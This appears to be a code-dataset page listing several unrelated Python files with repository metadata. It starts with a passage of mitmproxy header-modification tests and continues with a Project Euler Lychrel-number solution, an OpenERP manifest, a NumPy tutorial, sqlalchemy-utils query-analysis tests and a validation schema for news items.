            f.request.headers["one"] = "xxx"
            mh.request(f)
            assert "one" not in f.request.headers

            f = tflow.tflow(resp=True)
            f.response.headers["one"] = "xxx"
            mh.response(f)
            assert "one" not in f.response.headers

            # An empty replacement with no filter removes in both directions.
            tctx.configure(
                mh,
                modify_headers=[
                    "/one/"
                ]
            )
            f = tflow.tflow()
            f.request.headers["one"] = "xxx"
            mh.request(f)
            assert "one" not in f.request.headers

            f = tflow.tflow(resp=True)
            f.response.headers["one"] = "xxx"
            mh.response(f)
            assert "one" not in f.response.headers

            # test modifying a header that is also part of the filter expression
            # https://github.com/mitmproxy/mitmproxy/issues/4245
            tctx.configure(
                mh,
                modify_headers=[
                    "/~hq ^user-agent:.+Mozilla.+$/user-agent/Definitely not Mozilla ;)"
                ]
            )
            f = tflow.tflow()
            f.request.headers["user-agent"] = "Hello, it's me, Mozilla"
            mh.request(f)
            assert "Definitely not Mozilla ;)" == f.request.headers["user-agent"]

    @pytest.mark.parametrize("take", [True, False])
    def test_taken(self, take):
        # Flows that have already been "taken" (response set / killed) must
        # not be modified; the XOR asserts exactly that.
        mh = ModifyHeaders()
        with taddons.context(mh) as tctx:
            tctx.configure(mh, modify_headers=["/content-length/42"])
            f = tflow.tflow()
            if take:
                f.response = tresp()
            mh.request(f)
            assert (f.request.headers["content-length"] == "42") ^ take

            f = tflow.tflow(resp=True)
            if take:
                f.kill()
            mh.response(f)
            assert (f.response.headers["content-length"] == "42") ^ take
class TestModifyHeadersFile:
    """Tests for the "@file" replacement syntax of modify_headers."""

    def test_simple(self, tmpdir):
        addon = ModifyHeaders()
        with taddons.context(addon) as tctx:
            replacement = tmpdir.join("replacement")
            replacement.write("two")
            tctx.configure(addon, modify_headers=["/~q/one/@" + str(replacement)])
            flow = tflow.tflow()
            flow.request.headers["one"] = "xxx"
            addon.request(flow)
            assert flow.request.headers["one"] == "two"

    @pytest.mark.asyncio
    async def test_nonexistent(self, tmpdir):
        addon = ModifyHeaders()
        with taddons.context(addon) as tctx:
            # A missing file is rejected at configure time ...
            with pytest.raises(Exception, match="Cannot parse modify_headers .* Invalid file path"):
                tctx.configure(addon, modify_headers=["/~q/foo/@nonexistent"])

            # ... but a file deleted after configuration only logs at runtime.
            replacement = tmpdir.join("replacement")
            replacement.write("bar")
            tctx.configure(addon, modify_headers=["/~q/foo/@" + str(replacement)])
            replacement.remove()
            flow = tflow.tflow()
            flow.request.content = b"foo"
            addon.request(flow)
            await tctx.master.await_log("could not read")
|
arturh85/projecteuler | python/src/problem055.py | Python | mit | 2,561 | 0.001562 | # coding=utf-8
'''
Problem 55
24 October 2013
If we take 47, reverse and add, 47 + 74 = 121, which is palindromic.
Not all numbers produce palindromes so quickly. For example,
349 + 943 = 1292,
1292 + 2921 = 4213
4213 + 3124 = 7337
That is, 349 took three iterations to arrive at a palindrome.
Although no one has proved it yet, it is thought that some numbers, like 196, never produce a palindrome. A number that never forms a palindrome through the reverse and add process is called a Lychrel number. Due to the theoretical nature of these numbers, and for the purpose of this problem, we shall assume that a number is Lychrel until proven otherwise. In addition you are given that for every number below ten-thousand, it will either (i) become a palindrome in less than fifty iterations, or, (ii) no one, with all the computing power that exists, has managed so far to map it to a palindrome. In fact, 10677 is the first number to be shown to require over fifty iterations before producing a palindrome: 4668731596684224866951378664 (53 iterations, 28-digits).
Surprisingly, there are palindromic numbers that are themselves Lychrel numbers; the first example is 4994.
How many Lychrel numbers are there below ten-thousand?
NOTE: Wording was modified slightly on 24 April 2007 to emphasise the theoretical nature of Lychrel numbers.
----------------------------------------------------------
Created on 19.02.2015
@author: ahallmann
'''
import unittest
import timeit
from problem004 import is_palindrome
def step(n):
    """One reverse-and-add iteration: n plus its decimal-digit reversal."""
    reversed_n = int(str(n)[::-1])
    return n + reversed_n
def is_lycherel_number(n):
    """Return True if n is assumed Lychrel: no palindrome appears within
    fifty reverse-and-add iterations.

    The problem statement guarantees every non-Lychrel number below
    ten-thousand converges in fewer than fifty iterations; the previous
    bound of 30 happened to work but contradicted that specification.
    """
    for _ in range(50):
        n = step(n)
        if is_palindrome(str(n)):
            return False
    return True
def solve():
    """Count the Lychrel candidates below ten-thousand."""
    return sum(1 for n in range(1, 10000) if is_lycherel_number(n))
class Test(unittest.TestCase):
    # Examples lifted straight from the problem statement.
    def test_sample(self):
        self.assertEqual(121, step(47))
        self.assertFalse(is_lycherel_number(47))
        self.assertFalse(is_lycherel_number(349))
        self.assertTrue(is_lycherel_number(196))
        pass
    def test_answer(self):
        # 249 is the accepted Project Euler answer; this runs the full search.
        self.assertEqual(249, solve())
        pass
# -----------------------------------------
def run():
    # Uniform entry point shared by the project's problem modules.
    return solve()
if __name__ == '__main__':
    unittest.main()
# Alternative entry point kept for ad-hoc benchmarking with timeit:
# if __name__ == '__main__':
#     t = timeit.Timer("run()", "from __main__ import run")
#     count = 1
#     print(str(t.timeit(count)) + " seconds for " + str(count) + " runs")
|
VitalPet/c2c-rd-addons | c2c_reporting_tools_chricar/__terp__.py | Python | agpl-3.0 | 2,752 | 0.008727 | # -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (c) Camptocamp SA
# Author: Arnaud WÃŒst
#
#
# This file is part of the c2c_report_tools module.
#
#
# WARNING: This program as such is intended to be used by professional
# programmers who take the whole responsibility of assessing all potential
# consequences resulting from its eventual inadequacies and bugs.
# End users who are looking for a ready-to-use solution with commercial
# guarantees and support are strongly advised to contract a Free Software
# Service Company.
#
# This program is Free Software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
#
##############################################################################
# OpenERP module manifest (descriptor dict) for the c2c reporting library.
{
    "name": "c2c Reporting Tools. A library that provide a new way to create clean reports efficiently",
    "version": "5.0",
    "author": "Camptocamp",
    "category": "Generic Modules/Reporting",
    "description": """ This module offer a growing collection of objects to create simple and advanced reports in a new way of doing.
You can create powerful reports with a few lines of python code and nothing else. (no sxw, rml or xml)
This module follow multiple goals:
- To accelerate report creation by creating reusable pieces of code (one line of code to create standard header and footer)
- To accelerate report generation (processing) by getting ride of uncecessary parsing and transformations (direct python to pdf generation)
- To improve reporting capabilities by getting ride of uncomplete parsers and limited middle technologies
- To make reports designs more uniform
For exemples of use, have a look at c2c_planning_management. Our first module based on this tool.
""",
    "website": "http://www.camptocamp.com",
    "depends": [],
    "init_xml": [
    ],
    "data": [
    ],
    "active": False,
    "installable": True
}
|
abhishekkr/tutorials_as_code | talks-articles/machine-learning/google-courses/prework--numpy-ultraquick-tutorial.py | Python | mit | 2,051 | 0.006338 | """
## NumPy UltraQuick Tutorial
[source](https://colab.research.google.com/github/google/eng-edu/blob/main/ml/cc/exercises/numpy_ultraquick_tutorial.ipynb?utm_source=mlcc)
> create/manipulate vectors and matrices
"""
## import module as
import numpy as np

## populate array with specific numbers
### 'np.array' to create NumPy matrix with hand-picked values
one_dim_array = np.array([1.3, 3.7, 4.3, 5.6, 7.9])
print(one_dim_array)

two_dim_array = np.array([[1.3, 3.7], [4.3, 5.6], [6.4, 7.9]])
print(two_dim_array)

### can populate matrix with all zeros or one using 'np.zeros' or 'np.ones'

## populate arrays with number sequences using 'np.arange'
seq_int = np.arange(3, 9)
print(seq_int)

## populate arrays with random numbers
### 'randint' for integers
rand_ints_between_10_and_50 = np.random.randint(low=10, high=51, size=(5))
print(rand_ints_between_10_and_50)

### 'random' for floats between 0.0 & 1.0
rand_floats_between_0_and_1 = np.random.random([5])
print(rand_floats_between_0_and_1)

## math operations on NumPy operands
### 'broadcasting' is expanding shape of an operand in matrix math operation
### to dimensions compatible for that operation
rand_floats_between_1_and_2 = rand_floats_between_0_and_1 + 1.0
rand_floats_between_100_and_200 = rand_floats_between_1_and_2 * 100.0

"""
Task.1 Create a Linear Dataset
to create a simple dataset consisting single feature and label
* assign int sequence from 6 to 20 to a NumPy array name 'feature'
* assign 15 values to NumPy array named 'label' as: 'label = (3) (feature) + 4'; as first value be '(3) (6) + 4 = 22'
"""
feature = np.arange(6, 21)
print(feature)
label = (feature * 3) + 4.0
print(label)

"""
Task.2 Add some noise to the dataset
to mae dataset realistic; insert random noise to each element of 'label' array
* modify each value assigned to 'label' by adding different random float between -2/+2 without 'broadcasting'
instead create noise array having same dimension
"""
# np.random.random() yields values in [0.0, 1.0); scaling by 4 gives
# [0.0, 4.0), so shift by -2 to land in the [-2.0, +2.0) range the task
# asks for (the previous version forgot the shift and produced [0, 4)).
noise = (np.random.random([15]) * 4) - 2
print(noise)
label = label + noise
print(label)
|
cheungpat/sqlalchemy-utils | tests/functions/test_analyze.py | Python | bsd-3-clause | 936 | 0 | from sqlalchemy_utils import analyze
from tests import TestCase
class TestAnalyzeWithPostgres(TestCase):
    """Tests for analyze(); they require a running local PostgreSQL server."""

    # Connection string consumed by the shared TestCase base class.
    # NOTE(review): the attribute is spelled ``dns`` (not ``dsn``) because the
    # base class reads it under this name -- confirm upstream before renaming.
    dns = 'postgres://postgres@localhost/sqlalchemy_utils_test'

    def test_runtime(self):
        # EXPLAIN ANALYZE output always carries a total runtime.
        query = self.session.query(self.Article)
        assert analyze(self.connection, query).runtime

    def test_node_types_with_join(self):
        query = (
            self.session.query(self.Article)
            .join(self.Article.category)
        )
        analysis = analyze(self.connection, query)
        assert analysis.node_types == [
            u'Hash Join', u'Seq Scan', u'Hash', u'Seq Scan'
        ]

    def test_node_types_with_index_only_scan(self):
        query = (
            self.session.query(self.Article.name)
            .order_by(self.Article.name)
            .limit(10)
        )
        analysis = analyze(self.connection, query)
        assert analysis.node_types == [u'Limit', u'Index Only Scan']
andreymal/mini_fiction | mini_fiction/validation/news.py | Python | gpl-3.0 | 1,013 | 0.000987 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
from mini_fiction.validation.utils import bool_coerce, safe_string_coerce, safe_string_multiline_coerce
# Cerberus-style validation schema for a single news item.
NEWS_ITEM = {
    # Internal slug used to address the item.
    # NOTE(review): the character class [A-z] also matches '[', ']', '^',
    # '_' and '`'; [A-Za-z] was probably intended -- confirm before
    # tightening, as existing slugs may rely on it.
    'name': {
        'type': 'string',
        'coerce': safe_string_coerce,
        'required': True,
        'minlength': 1,
        'maxlength': 64,
        'regex': r'^[A-z\_\-\.][A-z0-9\_\-\.]*$',
    },
    'title': {
        'type': 'string',
        'coerce': safe_string_coerce,
        'required': False,
        'minlength': 1,
        'maxlength': 192,
        'default': '',
    },
    # Body text; multiline-safe coercion, capped at 64 KiB.
    'content': {
        'type': 'string',
        'coerce': safe_string_multiline_coerce,
        'required': True,
        'minlength': 0,
        'maxlength': 65535,
    },
    'is_template': {
        'type': 'boolean',
        'coerce': bool_coerce,
        'required': False,
        'default': False,
    },
    'show': {
        'type': 'boolean',
        'coerce': bool_coerce,
        'required': False,
        'default': False,
    },
}
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.